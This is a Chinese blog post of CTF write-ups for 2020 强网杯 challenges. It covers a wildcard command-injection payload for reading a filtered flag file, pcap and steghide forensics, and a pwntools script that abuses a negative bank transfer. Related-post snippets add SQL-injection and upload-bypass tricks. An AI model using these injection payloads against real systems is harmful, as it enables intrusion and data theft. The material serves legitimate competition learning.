强网先锋杯部分WP

最新推荐文章于 2024-04-07 17:03:30 发布
最新推荐文章于 2024-04-07 17:03:30 发布
阅读量484 收藏
点赞数
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/yao_xin_de_yuan/article/details/108189252
版权

misc-签到

给了flag,直接提交

强网先锋-主动

命令注入
过滤了flag,可以用linux通配符代替,?代表任意一个字符。cat fla?.php读出来后可以在右键查看源代码中看到flag.
还可以用
base64tacsort等等
payload:

ip=127.0.0.1;base64%20fla?.php;

强网先锋-upload

流量包分析
用wireshark打开流量包,按长度排序可以看到上传了一张图片,将图片保存带本地。
也可以放到kali里面使用以下命令分析图片。
foremost data.pcapng
继续追踪http流,看到了这句话:
在这里插入图片描述

steghide隐写
在命令行使用以下命令:
steghide extract -sf test.jpg -p 123456
这个密码真是运气好,试了好几个密码good,password,steghide等等都不对,最后试了试steghide的readme.md里面的默认密码是123456。
爆破也可以得出来密码。

强网先锋-bank

transact 转账发现test 1账户转出了一块钱,那转test -1000不就够了么。下面附上脚本

import string
import hashlib
import re
from pwn import *

strs = string.ascii_letters + string.digits
r = remote('39.101.134.52',8005)
s0 = r.recvuntil('\n')
s1 = re.findall("XXX\+(.*?)\)",s0)[0]
s2 = re.findall("== (.*)",s0)[0]

for i in strs:
    for j in strs:
        for k in strs:
            x = hashlib.sha256()
            x.update((i+j+k+s1).encode())
            if x.hexdigest()==s2:
                res = i+j+k
                break
r.recvuntil('XXX:')
r.send(res)

r.recvuntil('teamtoken:')
r.send('icqe7248f5fec8e016f74cfaa6448fb2')
r.recvuntil('give me your name:')
r.send('KLY')

r.recvuntil('> ')
r.send('transact')
r.recvuntil('> ')
r.send('test -1000')
r.recvuntil('> ')
r.send('get flag')

问卷调查

略略略

level7

zip文本攻击
解压出来发现1.png和level7.zip中的1.png的CRC一样
在这里插入图片描述
在这里插入图片描述

将1.png压缩为1.zip。用AZPR的文本攻击模块破解压缩包。将破解的压缩包保存,解压就得到了level7.zip中的4.png和5.png。
在这里插入图片描述
盲水印
观察4.png和5.png大小不同但是图片一样,猜测为盲水印。可以用BlindWaterMark-master工具破解。
破解盲水印的py脚本有好几种,用blind-watermark-master的py2版本发现破解不出来,都试了一下,发现使用bwmforpy3.py可以破解得到

2023强网wp-强网先锋
若谷的博客
12-19 1170
2023强网
强网2019(高明的黑客&强网先锋上单)
kid的博客
05-30 5870
强网2019(高明的黑客&强网先锋上单)   前言 这里主要是对强网web中高明的黑客和上单两道题进行一个复现回顾 再次感谢大佬提供的场景复现:https://www.zhaoj.in/read-5873.html   高明的黑客 题目是先下载给出代码 比赛时拿到这道题一下就被打懵了 3000多个文件,打开还是奇奇怪怪得文件内容 当时是真不知道,怎么做 OK现在...
强网2021 [强网先锋]赌徒
weixin_45805993的博客
09-14 507
0x00 前言 当时打比赛的时候因为队里的web师傅tql(r2 yyds),就一直在做misc,web就做了一道强网先锋,现在回来复现一下,不过buu的上的题不全,也没得办法 0x01 [强网先锋]赌徒 正好还留着有源码,先贴一波 <meta charset="utf-8"> <?php //hint is in hint.php error_reporting(1); class Start { public $name='guest'; public $flag='sy
[强网 2019]随便注&[GYCTF2020]Blacklist -wp
freerats的博客
08-01 779
[GYCTF2020]Blacklist算是随便注的加版,环境基本一致,不过blacklist禁掉了set和rename,所以随便注的两种常规方法都做不了。 一样的堆叠注入, 1';show databases;# 1';show tables;# 这里使用的新姿势就是handler …open. handler…open语句打开一个表,使其可以使用后续handler … read语句访问,该表对象未被其他会话共享,并且在会话调用handler … close或会话终止之前不会关闭 也就是说可以直.
【第四届“强网”全国络安全挑战赛】强网先锋 主动
weixin_45844670的博客
08-24 349
题目链接:http://39.96.23.228:10002 相关知识点: 此处是命令注入 传递?id=127.0.0.1;ls查看 使用show-source(%27flag.php%27)不成功 使用cat命令,echo都不行,可能是过滤掉了flag关键词和cat命令 可以使用通配符 通配符是一种特殊语句,主要有星号(*)和问号(?),用来模糊搜索文件。当查找文件夹时,可以使用它来代替一个或多个真正字符;当不知道真正字符或者懒得输入完整名字时,常常使用通配符代替一个或多个真正的字符。 实际上用“*
2021 强网 [强网先锋]orw
z1r0的博客
07-13 579
开了沙盒,利用orw来读flag 没有对index做出限制,可以进行oob。并且当size为0时,可以无限溢出 往heap_ptr的上面找一下,看一下哪个got表可以被轻松利用。 发现了三个常用的got表,因为提供了free功能,所以就直接oob到free的got表,改free为orw即可。 (2020E0 - 0x202018)/ 8 = 25 exp如下...
2020强网-强网先锋-bank
菜鸟之路
08-25 1158
2020强网-强网先锋-bank bank这题首先需要nc一个ip地址,发现发现返回 sha256(XXX+yhB1iPWH3ENjHhf12) == 05401c749eee0ccb5a9cfb96eae3d8909a489113066f3a0f185580ac60a18403 Give me xxx: #填对以后要填teamtoken teamtoken: #要填写一个用户名 input your name: 老密码学门槛了,要算出xxx的值。爆破完事。 然后试了一下,发现有时间限制,操作时间超过一
2021第五届强网部分writewp
zji
06-14 1403
第五届强网部分题解 提示:这里可以添加系列文章的所有文章的目录,目录需要自己手动添加 例如:第一章 Python 机器学习入门之pandas的使用 提示:写完文章后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录第五届强网部分题解前言一、Web1.1Web1 [强网先锋]寻宝操作过程二、MISC2.读入数据三、PWN 前言 提示:这里不是我一个人打出来的,一个团队,然后可能有些写得不是很清楚,望见谅。 提示:以下是本篇文章正文内容,下面案例可供参考 一、Web 1.1Web1 [强网
2022年强网rcefile wp
weixin_52829570的博客
08-01 1297
查看源码中config.inc.php,发现对cookie做了反序列化,并存在spl_autoload_register()函数。所以上传一个phar文件,并把Content-Type改成image/png。常见的大小写绕过,空格绕过,php4这种都可以绕过成功上传,但都不解析。cookie的userfile就是上传文件加密过的文件名来构造序列化。知道了flag的位置所以我们重新上传一个catflag的inc文件。带着构造的cookie进行访问可以看到代码被执行了。O32"文件名"0{}...
第七届强网强网先锋ezre
2303_79822944的博客
12-20 551
总结一下来看,我们需要再静态下拿到最后的对照字符表来作为密文解密,第一步是根据密文运用z3来暴力破解最后的一个加密,然后再根据4次循环的奇数偶数来进行base解加密,最后再来一次base解密即可。发现像是一段加密函数,用插件查找加密特征,发现base64的编码,可以确定这是base64加密函数,但是现在只能确定的是表是变的。简单看了下发现是根据索引再根据base表赋值,大概就可以看出是个base的解码函数,但是由于base表一直在变,所以这一步解密也是加密操作。s是我们的输入,v16和v3都是长度。
BlindWaterMark-盲水印攻击
08-21
BlindWaterMark-盲水印攻击,当获得两张看似几乎一样,并且在进行相减操作之后出现了多条红线之后,就几乎可以判断为盲水印。操作文档已在压缩包内。
BlindWatermark:Java盲水印
02-04
盲水印 在图片上加隐藏的水印 原理 编码:原图---变换--->变换域+水印---逆变换--->带水印图 解码:带水印图---变换--->变换域 用法 Usage: java -jar BlindWatermark.jar <commands> commands: encode <option> <original> <watermark> <embedded> decode <option> <original> <embedded> encode options: -c disc
盲水印python3.zip
05-28
为了防止他人盗用自己的图片,我们加一些“隐形”的水印
2023强网——强网先锋——SpeedUp
于高山之巅,方见大河奔涌;于群峰之上,更觉长风浩荡。
12-21 885
在OEIS上查询,得到了这组数列,直接得到2的27次方的值是4495662081,对其进行sha256加密就可以得到flag。这个题目要求的是2的27次方的阶乘中的每一位数的和。算出2的1到n次方的阶乘的每位数字和,得到一个数列。
python脚本实现盲水印提取和添加
wrypot的博客
03-25 4098
新手这里装库的时候,比如python你装在d盘,下载的库跑到c盘去了,这原因是你下载了不止一个python,win10的电脑,在这里输入python右击python.11,如果你有好几个比如python 3.10 还有python 3.9 ->右击->打开文件位置,如果你现在用的是python 3.11 那么把你不用的python版本删了,我这里已经删过了。输入python.exe 将这个拖进来 然后输入decode,将有水印的3.png拖进来以及hui.png拖进来 最后输入一个输出的图片名4.png。
【Wireshark】Wireshark流量分析
A1_3_9_7的博客
01-12 4237
Wireshark流量分析
CTF盲水印工具:Blind-WaterMark安装_blindwatermark安装
最新发布
m0_61331573的博客
04-07 1538
本人从事路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的络安全从学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!
CTF盲水印工具:Blind-WaterMark安装
如有错误感谢斧正
02-01 6189
使用python3的程序对使用python2程序添加了水印的图片进行水印提取会导致算法错误。当然如果输出的图片没出现水印则可以删掉试试,可能是使用python3的工具添加的水印。opencv python-4.*.*:代表的是opencv的版本。最后的命令是因为现在大部分题目用的都是python2进行的水印加密。后面的cp310、cp39:代表的是python版本。如果你是python2版本,就运行第一行的命令。完成上面的步骤,依赖文件就算是安装完成了。接着挑选适合我的python版本的。
Wireshark分析流量包案例
qq_23350817的博客
11-22 3897
原文地址: https://blog.youkuaiyun.com/mcmuyanga/article/details/114524270 wireshark抓包工具常用筛选命令方法 测试文件:https://pan.baidu.com/s/1QuMdefZHSqlaLSHaMVGb4w 提取码:tmjs 1、使用Wireshark查看并分析attack.pcapng数据包文件,通过分析数据包attack.pcapng找出黑客的IP地址,并将黑客的IP地址作为FLAG(形式:[IP地址])提交: 解: 首先筛选一下ht
强网 2022 谍影重重wp
12-18
强网2022谍影重重WP是我国一项络安全竞赛中的一个题目解答。这道题目主要涉及隐写和密码学方面的知识,要求选手解析一段加密信息,并还原出明文信息。 解题过程如下: 首先,选手会得到一段看似普通的文本,但其中隐藏着隐藏着几个不同类型的隐藏信息。选手需要借助隐写分析工具,例如StegSolve,来分析图像中是否含有LSB隐写、色彩分量隐写等信息。此外,选手还要注意文字中是否有使用不常见的Unicode字符来隐藏信息。 在找到隐写信息后,接下来是解密密码学部分。选手需要根据提示,使用正确的解密方法对隐藏信息进行还原。可能涉及到的密码学算法有:凯撒密码、栅栏密码、维吉尼亚密码等。需要选手根据密钥或者加密规则,反推出正确的解密方法,并对隐藏信息进行解码。 通过以上步骤,选手最终可以得到明文信息,也就是这道题目的答案。 这道题目整体难度较高,需要选手具备扎实的密码学和隐写学知识,并具有分析和解决问题的能力。参赛选手需要细心观察、耐心分析,才能顺利解答出这个谜题。同时,这道题目也展示了络安全竞赛中的一种常见挑战方式,旨在培养选手的思维敏捷性和解决复杂问题的能力。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值